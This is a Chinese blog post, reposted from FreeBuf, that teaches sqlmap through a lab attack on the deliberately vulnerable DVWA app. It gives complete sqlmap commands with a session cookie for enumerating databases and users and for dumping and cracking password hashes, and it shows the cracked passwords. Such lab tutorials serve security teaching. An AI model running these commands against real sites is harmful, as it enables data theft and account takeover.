<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="utf-8">

    

    
    <title>SQL注入之SQLmap入门 | jinyou blog</title>
    
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
        <meta name="keywords" content="">
    
    <meta name="description" content="###什么是SQLmap？ SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具，有一个非常棒的特性，即对检测与利用的自动化处理（数据库指纹、访问底层文件系统、执行命令）。">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL注入之SQLmap入门">
<meta property="og:url" content="http://yoursite.com/2017/09/27/SQL注入之SQLmap入门/index.html">
<meta property="og:site_name" content="jinyou blog">
<meta property="og:description" content="###什么是SQLmap？ SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具，有一个非常棒的特性，即对检测与利用的自动化处理（数据库指纹、访问底层文件系统、执行命令）。">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://upload-images.jianshu.io/upload_images/977602-e18fb96794c1671a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:updated_time" content="2017-12-15T02:41:51.535Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="SQL注入之SQLmap入门">
<meta name="twitter:description" content="###什么是SQLmap？ SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具，有一个非常棒的特性，即对检测与利用的自动化处理（数据库指纹、访问底层文件系统、执行命令）。">
<meta name="twitter:image" content="http://upload-images.jianshu.io/upload_images/977602-e18fb96794c1671a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
    

    
        <link rel="alternate" href="/" title="jinyou blog" type="application/atom+xml">
    

    

    <link rel="stylesheet" href="/libs/font-awesome/css/font-awesome.min.css">
    <link rel="stylesheet" href="/libs/titillium-web/styles.css">
    <link rel="stylesheet" href="/libs/source-code-pro/styles.css">

    <link rel="stylesheet" href="/css/style.css">

    <script src="/libs/jquery/3.3.1/jquery.min.js"></script>
    
    
        <link rel="stylesheet" href="/libs/lightgallery/css/lightgallery.min.css">
    
    
        <link rel="stylesheet" href="/libs/justified-gallery/justifiedGallery.min.css">
    
    
    


</head>
</html>
<body>
    <div id="wrap">
        <header id="header">
    <div id="header-outer" class="outer">
        <div class="container">
            <div class="container-inner">
                <div id="header-title">
                    <h1 class="logo-wrap">
                        <a href="/" class="logo"></a>
                    </h1>
                    
                </div>
                <div id="header-inner" class="nav-container">
                    <a id="main-nav-toggle" class="nav-icon fa fa-bars"></a>
                    <div class="nav-container-inner">
                        <ul id="main-nav">
                            
                                <li class="main-nav-list-item">
                                    <a class="main-nav-list-link" href="/">主页</a>
                                </li>
                            
                                        
                                    
                                <li class="main-nav-list-item">
                                    <a class="main-nav-list-link" href="/about/index.html">关于</a>
                                </li>
                            
                        </ul>
                        <nav id="sub-nav">
                            <div id="search-form-wrap">

    <form class="search-form">
        <input type="text" class="ins-search-input search-form-input" placeholder="搜索">
        <button type="submit" class="search-form-submit"></button>
    </form>
    <div class="ins-search">
    <div class="ins-search-mask"></div>
    <div class="ins-search-container">
        <div class="ins-input-wrapper">
            <input type="text" class="ins-search-input" placeholder="想要查找什么...">
            <span class="ins-close ins-selectable"><i class="fa fa-times-circle"></i></span>
        </div>
        <div class="ins-section-wrapper">
            <div class="ins-section-container"></div>
        </div>
    </div>
</div>
<script>
(function (window) {
    var INSIGHT_CONFIG = {
        TRANSLATION: {
            POSTS: '文章',
            PAGES: '页面',
            CATEGORIES: '分类',
            TAGS: '标签',
            UNTITLED: '(未命名)',
        },
        ROOT_URL: '/',
        CONTENT_URL: '/content.json',
    };
    window.INSIGHT_CONFIG = INSIGHT_CONFIG;
})(window);
</script>
<script src="/js/insight.js"></script>

</div>
                        </nav>
                    </div>
                </div>
            </div>
        </div>
    </div>
</header>
        <div class="container">
            <div class="main-body container-inner">
                <div class="main-body-inner">
                    <section id="main">
                        <div class="main-body-header">
    <h1 class="header">
    
    未分类
    </h1>
</div>

                        <div class="main-body-content">
                            <article id="post-SQL注入之SQLmap入门" class="article article-single article-type-post" itemscope="" itemprop="blogPost">
    <div class="article-inner">
        
            <header class="article-header">
                
    
        <h1 class="article-title" itemprop="name">
        SQL注入之SQLmap入门
        </h1>
    

            </header>
        
        
            <div class="article-meta">
                
    <div class="article-date">
        <a href="/2017/09/27/SQL注入之SQLmap入门/" class="article-date">
            <time datetime="2017-09-27T06:34:41.000Z" itemprop="datePublished">2017-09-27</time>
        </a>
    </div>

		

                
            </div>
        
        
        <div class="article-entry" itemprop="articleBody">
            <p>###什么是SQLmap？</p>
<p><strong>SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具，有一个非常棒的特性，即对检测与利用的自动化处理（数据库指纹、访问底层文件系统、执行命令）。</strong><br><a id="more"></a><br>读者可以通过位于SourceForge的官方网站下载SQLmap源码：<a href="http://sourceforge.net/projects/sqlmap/" target="_blank" rel="noopener">http://sourceforge.net/projects/sqlmap/</a></p>
<p>###SQLmap的作者是谁？<br>Bernardo DameleAssumpcao Guimaraes (@inquisb)，读者可以通过<a href="mailto:bernardo@sqlmap.org" target="_blank" rel="noopener">bernardo@sqlmap.org</a>与他取得联系，以及Miroslav Stampar (@stamparm)读者可以通过<a href="mailto:miroslav@sqlmap.org" target="_blank" rel="noopener">miroslav@sqlmap.org</a>与他联系。</p>
<p>同时读者也可以通过<a href="mailto:dev@sqlmap.org" target="_blank" rel="noopener">dev@sqlmap.org</a>与SQLmap的<a href="http://www.freebuf.com/sectool/77948.html" target="_blank" rel="noopener">所有开发者</a>联系。</p>
<p>###执行SQLmap的命令是什么？<br>进入sqlmap.py所在的目录，执行以下命令：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">#python sqlmap.py -h</span><br></pre></td></tr></table></figure></p>
<p>（译注：选项列表太长了，而且与最新版本有些差异，所以这里不再列出，请读者下载最新版在自己机器上看吧）</p>
<p>SQLmap命令选项被归类为目标（Target）选项、请求（Request）选项、优化、注入、检测、技巧（Techniques）、指纹、枚举等。</p>
<p>###如何使用SQLmap：<br>为方便演示，我们创建两个虚拟机：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">1、受害者机器， windows     XP操作系统，运行一个web服务器，同时跑着一个包含漏洞的web应用（DVWA）。</span><br><span class="line"></span><br><span class="line">2、攻击器机器，使用Ubuntu     12.04，包含SQLmap程序。</span><br></pre></td></tr></table></figure></p>
<p>本次实验的目的：使用SQLmap得到以下信息：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">3、枚举MYSQL用户名与密码。</span><br><span class="line"></span><br><span class="line">4、枚举所有数据库。</span><br><span class="line"></span><br><span class="line">5、枚举指定数据库的数据表。</span><br><span class="line"></span><br><span class="line">6、枚举指定数据表中的所有用户名与密码。</span><br></pre></td></tr></table></figure></p>
<p>使用SQLmap之前我们得到需要当前会话cookies等信息，用来在渗透过程中维持连接状态，这里使用Firefox中名为“TamperData”的add-on获取。</p>
<p><img src="http://upload-images.jianshu.io/upload_images/977602-e18fb96794c1671a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"><br>当前得到的cookie为“<strong>security=high;PHPSESSID=57p5g7f32b3ffv8l45qppudqn3</strong>″。<br>为方便演示，我们将DVWA安全等级设置为low：<br><a href="http://image.3001.net/images/20140326/13958006297369.png" target="_blank" rel="noopener"><img src="http://upload-images.jianshu.io/upload_images/977602-cd88f314864cdb6b.png!small?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="SQL入门"></a><br>接下来我们进入页面的“SQL Injection”部分，输入任意值并提交。可以看到get请求的ID参数如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit#”</span><br></pre></td></tr></table></figure></p>
<p>因此该页面就是我们的目标页面。</p>
<p>以下命令可以用来检索当前数据库和当前用户：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">“./sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit” –cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” -b –current-db –current-user”</span><br></pre></td></tr></table></figure></p>
<p>###使用选项：<br>1、–cookie : 设置我们的cookie值“将DVWA安全等级从high设置为low”<br>2、-u : 指定目标URL<br>3、-b : 获取DBMS banner<br>4、–current-db : 获取当前数据库<br>5、–current-user:获取当前用户<br>结果如下：<br><a href="http://image.3001.net/images/20140326/13958006473538.png" target="_blank" rel="noopener"><img src="http://upload-images.jianshu.io/upload_images/977602-c1802858ad60b172.png!small?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="SQL入门"></a><br>可以看到结果如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">DBMS : MySQLversion 5.0</span><br><span class="line">OS versionUbuntu 12.04</span><br><span class="line">current user:root</span><br><span class="line">current db :DVWA</span><br></pre></td></tr></table></figure></p>
<p>以下命令用来枚举所有的DBMS用户和密码hash，在以后更进一步的攻击中可以对密码hash进行破解：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">“sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit” --cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” --string=”Surname” --users --password”</span><br></pre></td></tr></table></figure></p>
<p>使用选项：<br>1、–string : 当查询可用时用来匹配页面中的字符串<br>2、–users : 枚举DBMS用户<br>3、–password : 枚举DBMS用户密码hash<br><a href="http://image.3001.net/images/20140326/13958006501262.png" target="_blank" rel="noopener"><img src="http://upload-images.jianshu.io/upload_images/977602-b882a16abd540ca0.png!small?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="SQL入门"></a><br>结果如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">databasemanagement system users [142]:</span><br><span class="line">[*] ”@’kingasmk’</span><br><span class="line">[*]”@’localhost’</span><br><span class="line">[*]‘debian-sys-maint’@&apos;localhost’</span><br><span class="line">[*]‘phpmyadmin’@&apos;localhost’</span><br><span class="line">[*]‘root’@’127.0.0.1′</span><br><span class="line">[*] ‘root’@&apos;::1′</span><br><span class="line">[*]‘root’@&apos;kingasmk’</span><br><span class="line">[*]‘root’@&apos;localhost’</span><br></pre></td></tr></table></figure></p>
<p>数据库管理系统用户和密码hash：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">[*]debian-sys-maint [1]:</span><br><span class="line">password hash:*C30441E06530498BC86019BF3211B94B3BAB295A</span><br><span class="line">[*] phpmyadmin[1]:</span><br><span class="line">password hash:*C30441E06530498BC86019BF3211B94B3BAB295A</span><br><span class="line">[*] root [4]:</span><br><span class="line">password hash: *C30441E06530498BC86019BF3211B94B3BAB295A</span><br><span class="line">password hash:*C30441E06530498BC86019BF3211B94B3BAB295A</span><br><span class="line">password hash:*C30441E06530498BC86019BF3211B94B3BAB295A</span><br><span class="line">password hash:*C30441E06530498BC86019BF3211B94B3BAB295A</span><br></pre></td></tr></table></figure></p>
<p>读者可以使用Cain&amp;Abel、John&amp;Ripper等工具将密码hash破解为明文。以下命令会枚举系统中所有的数据库schema：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">“sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit”</span><br><span class="line">--cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” --dbs”</span><br></pre></td></tr></table></figure></p>
<p>使用选项：<br>–dbs: 枚举DBMS中的数据库</p>
<p><a href="http://image.3001.net/images/20140326/13958006531974.png" target="_blank" rel="noopener"><img src="http://upload-images.jianshu.io/upload_images/977602-269f1ef498a338aa.png!small?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="SQL入门"></a><br>结果如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">availabledatabases [5]:</span><br><span class="line">[*]dvwa</span><br><span class="line">[*]information_schema</span><br><span class="line">[*]mysql</span><br><span class="line">[*]performance_schema</span><br><span class="line">[*]phpmyadmin</span><br></pre></td></tr></table></figure></p>
<p>下面我们尝试枚举DVWA数据表，执行以下命令：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">“sqlmap.py-u “http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit” --cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” -D dvwa --tables”</span><br></pre></td></tr></table></figure></p>
<p>使用选项：<br>1、-D : 要枚举的DBMS数据库<br>2、–tables     : 枚举DBMS数据库中的数据表<br><a href="http://image.3001.net/images/20140326/13958006567924.png" target="_blank" rel="noopener"><img src="http://upload-images.jianshu.io/upload_images/977602-a23c72c8461a5bc1.png!small?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="SQL入门"></a><br>得到结果如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">Database: dvwa</span><br><span class="line">[2 tables]</span><br><span class="line">+————+</span><br><span class="line">| guestbook |</span><br><span class="line">| users |</span><br><span class="line">+————+</span><br></pre></td></tr></table></figure></p>
<p>下面获取用户表的列，命令如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">“sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit” --cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” -D dvwa -T users --columns”</span><br></pre></td></tr></table></figure></p>
<p>使用选项：<br>-T : 要枚举的DBMS数据库表</p>
<p>–columns : 枚举DBMS数据库表中的所有列</p>
<p><a href="http://image.3001.net/images/20140326/139580065727.png" target="_blank" rel="noopener"><img src="http://upload-images.jianshu.io/upload_images/977602-32256a0dbe738288.png!small?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="SQL入门"></a><br>结果如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">Database: dvwa</span><br><span class="line">Table: users</span><br><span class="line">[6 columns]</span><br><span class="line">+————+————-+</span><br><span class="line">| Column | Type|</span><br><span class="line">+————+————-+</span><br><span class="line">| avatar |varchar(70) |</span><br><span class="line">| first_name |varchar(15) |</span><br><span class="line">| last_name |varchar(15) |</span><br><span class="line">| password |varchar(32) |</span><br><span class="line">| user |varchar(15) |</span><br><span class="line">| user_id |int(6) |</span><br><span class="line">+————+————-+</span><br></pre></td></tr></table></figure></p>
<p>如上所示，以上为我们感兴趣的列，表示用户名与密码等。下面将每一列的内容提取出来。执行以下命令，将用户与密码表中的所有用户名与密码dump出来：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">“sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit”–cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low” -D dvwa -T users-C user,password --dump”</span><br></pre></td></tr></table></figure></p>
<p><strong>使用选项：</strong><br>-T : 要枚举的DBMS数据表</p>
<p>-C: 要枚举的DBMS数据表中的列</p>
<p>–dump : 转储DBMS数据表项</p>
<p>SQLmap会提问是否破解密码，按回车确认：<br><a href="http://image.3001.net/images/20140326/13958006608637.png" target="_blank" rel="noopener"><img src="http://upload-images.jianshu.io/upload_images/977602-3de5d38d6beae65b.png!small?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="SQL入门"></a><br>得到所有用户名与明文密码如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">Database: dvwa</span><br><span class="line">Table: users</span><br><span class="line">[5 entries]</span><br><span class="line">+———+———+———————————————+</span><br><span class="line">| user_id | user| password |</span><br><span class="line">+———+———+———————————————+</span><br><span class="line">| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99(password) |</span><br><span class="line">| 2 | gordonb |e99a18c428cb38d5f260853678922e03 (abc123) |</span><br><span class="line">| 3 | 1337 |8d3533d75ae2c3966d7e0d4fcc69216b (charley) |</span><br><span class="line">| 4 | pablo |0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) |</span><br><span class="line">| 5 | smithy |5f4dcc3b5aa765d61d8327deb882cf99 (password) |</span><br><span class="line">+———+———+———————————————+</span><br></pre></td></tr></table></figure></p>
<p>这时我们就可以利用admin帐户登录做任何事了。</p>
<p>总结：<br>SQLmap是一个非常强大的工具，可以用来简化操作，并自动处理SQL注入检测与利用。</p>
<p>原文地址：<a href="http://www.freebuf.com/articles/web/29942.html" target="_blank" rel="noopener">http://www.freebuf.com/articles/web/29942.html</a></p>

        </div>
        <footer class="article-footer">
            



    <a data-url="http://yoursite.com/2017/09/27/SQL注入之SQLmap入门/" data-id="cjrilcydu000wckuurz8izsok" class="article-share-link"><i class="fa fa-share"></i>分享到</a>
<script>
    (function ($) {
        $('body').on('click', function() {
            $('.article-share-box.on').removeClass('on');
        }).on('click', '.article-share-link', function(e) {
            e.stopPropagation();

            var $this = $(this),
                url = $this.attr('data-url'),
                encodedUrl = encodeURIComponent(url),
                id = 'article-share-box-' + $this.attr('data-id'),
                offset = $this.offset(),
                box;

            if ($('#' + id).length) {
                box = $('#' + id);

                if (box.hasClass('on')){
                    box.removeClass('on');
                    return;
                }
            } else {
                var html = [
                    '<div id="' + id + '" class="article-share-box">',
                        '<input class="article-share-input" value="' + url + '">',
                        '<div class="article-share-links">',
                            '<a href="https://twitter.com/intent/tweet?url=' + encodedUrl + '" class="article-share-twitter" target="_blank" title="Twitter"></a>',
                            '<a href="https://www.facebook.com/sharer.php?u=' + encodedUrl + '" class="article-share-facebook" target="_blank" title="Facebook"></a>',
                            '<a href="http://pinterest.com/pin/create/button/?url=' + encodedUrl + '" class="article-share-pinterest" target="_blank" title="Pinterest"></a>',
                            '<a href="https://plus.google.com/share?url=' + encodedUrl + '" class="article-share-google" target="_blank" title="Google+"></a>',
                        '</div>',
                    '</div>'
                ].join('');

              box = $(html);

              $('body').append(box);
            }

            $('.article-share-box.on').hide();

            box.css({
                top: offset.top + 25,
                left: offset.left
            }).addClass('on');

        }).on('click', '.article-share-box', function (e) {
            e.stopPropagation();
        }).on('click', '.article-share-box-input', function () {
            $(this).select();
        }).on('click', '.article-share-box-link', function (e) {
            e.preventDefault();
            e.stopPropagation();

            window.open(this.href, 'article-share-box-window-' + Date.now(), 'width=500,height=450');
        });
    })(jQuery);
</script>

        </footer>
    </div>
    <script type="application/ld+json">
    {
        "@context": "https://schema.org",
        "@type": "BlogPosting",
        "author": {
            "@type": "Person",
            "name": "jinyou"
        },
        "headline": "SQL注入之SQLmap入门",
        "image": "http://yoursite.comhttp://upload-images.jianshu.io/upload_images/977602-e18fb96794c1671a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240",
        "keywords": "",
        "genre": "",
        "datePublished": "2017-09-27",
        "dateCreated": "2017-09-27",
        "dateModified": "2017-12-15",
        "url": "http://yoursite.com/2017/09/27/SQL注入之SQLmap入门/",
        "description": "###什么是SQLmap？
SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具，有一个非常棒的特性，即对检测与利用的自动化处理（数据库指纹、访问底层文件系统、执行命令）。"
        "wordCount": 458
    }
</script>

</article>

    <section id="comments">
    
        
    <div id="disqus_thread">
        <noscript>Please enable JavaScript to view the <a href="//disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
    </div>

    
    </section>



                        </div>
                    </section>
                    <aside id="sidebar">
    <a class="sidebar-toggle" title="Expand Sidebar"><i class="toggle icon"></i></a>
    <div class="sidebar-top">
        <p>关注我 :</p>
        <ul class="social-links">
            
                
                <li>
                    <a class="social-tooltip" title="twitter" href="/" target="_blank" rel="noopener">
                        <i class="icon fa fa-twitter"></i>
                    </a>
                </li>
                
            
                
                <li>
                    <a class="social-tooltip" title="facebook" href="/" target="_blank" rel="noopener">
                        <i class="icon fa fa-facebook"></i>
                    </a>
                </li>
                
            
                
                <li>
                    <a class="social-tooltip" title="google-plus" href="/" target="_blank" rel="noopener">
                        <i class="icon fa fa-google-plus"></i>
                    </a>
                </li>
                
            
                
                <li>
                    <a class="social-tooltip" title="github" href="https://github.com/ppoffice/hexo-theme-hueman" target="_blank" rel="noopener">
                        <i class="icon fa fa-github"></i>
                    </a>
                </li>
                
            
                
                <li>
                    <a class="social-tooltip" title="weibo" href="/" target="_blank" rel="noopener">
                        <i class="icon fa fa-weibo"></i>
                    </a>
                </li>
                
            
                
                <li>
                    <a class="social-tooltip" title="rss" href="/" target="_blank" rel="noopener">
                        <i class="icon fa fa-rss"></i>
                    </a>
                </li>
                
            
        </ul>
    </div>
    
        
<nav id="article-nav">
    
        <a href="/2017/09/27/外挂抢红包年入-3-千万？揭秘微信外挂背后的灰色产业链/" id="article-nav-newer" class="article-nav-link-wrap">
        <strong class="article-nav-caption">下一篇</strong>
        <p class="article-nav-title">
        
            外挂抢红包年入 3 千万？揭秘微信外挂背后的灰色产业链
        
        </p>
        <i class="icon fa fa-chevron-right" id="icon-chevron-right"></i>
    </a>
    
    
        <a href="/2017/09/27/广工师兄带你深度揭秘地下色情诱导网站，上车吧/" id="article-nav-older" class="article-nav-link-wrap">
        <strong class="article-nav-caption">上一篇</strong>
        <p class="article-nav-title"> 广工师兄带你深度揭秘地下色情诱导网站，上车吧</p>
        <i class="icon fa fa-chevron-left" id="icon-chevron-left"></i>
        </a>
    
</nav>

    
    <div class="widgets-container">
        
            
                

            
                
    <div class="widget-wrap">
        <h3 class="widget-title">最新文章</h3>
        <div class="widget">
            <ul id="recent-post" class="">
                
                    <li>
                        
                        <div class="item-thumbnail">
                            <a href="/2017/12/13/无论是第一批90后还是年轻人-为何都感叹自己老了/" class="thumbnail">
    
    
        <span style="background-image:url(/images/11.jpg)" alt="无论是第一批90后还是年轻人 为何都感叹自己老了" class="thumbnail-image"></span>
    
    
</a>

                        </div>
                        
                        <div class="item-inner">
                            <p class="item-category"></p>
                            <p class="item-title"><a href="/2017/12/13/无论是第一批90后还是年轻人-为何都感叹自己老了/" class="title">无论是第一批90后还是年轻人 为何都感叹自己老了</a></p>
                            <p class="item-date"><time datetime="2017-12-13T02:51:35.000Z" itemprop="datePublished">2017-12-13</time></p>
                        </div>
                    </li>
                
                    <li>
                        
                        <div class="item-thumbnail">
                            <a href="/2017/12/07/最好用的开源Web漏扫工具梳理/" class="thumbnail">
    
    
        <span style="background-image:url(/images/1.png)" alt="最好用的开源Web漏扫工具梳理" class="thumbnail-image"></span>
    
    
</a>

                        </div>
                        
                        <div class="item-inner">
                            <p class="item-category"></p>
                            <p class="item-title"><a href="/2017/12/07/最好用的开源Web漏扫工具梳理/" class="title">最好用的开源Web漏扫工具梳理</a></p>
                            <p class="item-date"><time datetime="2017-12-07T08:42:29.000Z" itemprop="datePublished">2017-12-07</time></p>
                        </div>
                    </li>
                
                    <li>
                        
                        <div class="item-thumbnail">
                            <a href="/2017/12/07/7800元在美国官网购买256G-iPhone-X的经历/" class="thumbnail">
    
    
        <span style="background-image:url(http://sinastorage.com/storage.miaosha.sina.com.cn/products/201712/bfc9c73436bc8d440c6e66e9eb65f660.png)" alt="7800元在美国官网购买256G iPhone X的经历" class="thumbnail-image"></span>
    
    
</a>

                        </div>
                        
                        <div class="item-inner">
                            <p class="item-category"></p>
                            <p class="item-title"><a href="/2017/12/07/7800元在美国官网购买256G-iPhone-X的经历/" class="title">7800元在美国官网购买256G iPhone X的经历</a></p>
                            <p class="item-date"><time datetime="2017-12-07T02:24:11.000Z" itemprop="datePublished">2017-12-07</time></p>
                        </div>
                    </li>
                
                    <li>
                        
                        <div class="item-thumbnail">
                            <a href="/2017/11/24/iOS中最值得设计师学习的33个APP图标/" class="thumbnail">
    
    
        <span style="background-image:url(http://img.mp.itc.cn/upload/20170509/737a9c5efafb45498f4be2386042fc64_th.jpg)" alt="iOS中最值得设计师学习的33个APP图标" class="thumbnail-image"></span>
    
    
</a>

                        </div>
                        
                        <div class="item-inner">
                            <p class="item-category"></p>
                            <p class="item-title"><a href="/2017/11/24/iOS中最值得设计师学习的33个APP图标/" class="title">iOS中最值得设计师学习的33个APP图标</a></p>
                            <p class="item-date"><time datetime="2017-11-24T07:47:02.000Z" itemprop="datePublished">2017-11-24</time></p>
                        </div>
                    </li>
                
                    <li>
                        
                        <div class="item-thumbnail">
                            <a href="/2017/11/16/“高考零分生”的中场战事/" class="thumbnail">
    
    
        <span style="background-image:url(http://upload-images.jianshu.io/upload_images/977602-84781c20619e7fbf.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)" alt="“高考零分生”的中场战事" class="thumbnail-image"></span>
    
    
</a>

                        </div>
                        
                        <div class="item-inner">
                            <p class="item-category"></p>
                            <p class="item-title"><a href="/2017/11/16/“高考零分生”的中场战事/" class="title">“高考零分生”的中场战事</a></p>
                            <p class="item-date"><time datetime="2017-11-16T02:42:11.000Z" itemprop="datePublished">2017-11-16</time></p>
                        </div>
                    </li>
                
            </ul>
        </div>
    </div>

            
                

            
                
    <div class="widget-wrap widget-list">
        <h3 class="widget-title">归档</h3>
        <div class="widget">
            <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/12/">十二月 2017</a><span class="archive-list-count">3</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/11/">十一月 2017</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/10/">十月 2017</a><span class="archive-list-count">7</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/09/">九月 2017</a><span class="archive-list-count">11</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/08/">八月 2017</a><span class="archive-list-count">3</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/07/">七月 2017</a><span class="archive-list-count">6</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/06/">六月 2017</a><span class="archive-list-count">3</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/05/">五月 2017</a><span class="archive-list-count">8</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/04/">四月 2017</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/03/">三月 2017</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/02/">二月 2017</a><span class="archive-list-count">3</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2016/11/">十一月 2016</a><span class="archive-list-count">1</span></li></ul>
        </div>
    </div>


            
                
    <div class="widget-wrap widget-list">
        <h3 class="widget-title">标签</h3>
        <div class="widget">
            <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/Markdown指南/">Markdown指南</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/iOS逆向工程/">iOS逆向工程</a><span class="tag-list-count">4</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/搬瓦工/">搬瓦工</a><span class="tag-list-count">1</span></li></ul>
        </div>
    </div>


            
                
    <div class="widget-wrap widget-float">
        <h3 class="widget-title">标签云</h3>
        <div class="widget tagcloud">
            <a href="/tags/Markdown指南/" style="font-size: 10px;">Markdown指南</a> <a href="/tags/iOS逆向工程/" style="font-size: 20px;">iOS逆向工程</a> <a href="/tags/搬瓦工/" style="font-size: 10px;">搬瓦工</a>
        </div>
    </div>


            
                
    <div class="widget-wrap widget-list">
        <h3 class="widget-title">链接</h3>
        <div class="widget">
            <ul>
                
                    <li>
                        <a href="http://hexo.io">Hexo</a>
                    </li>
                
            </ul>
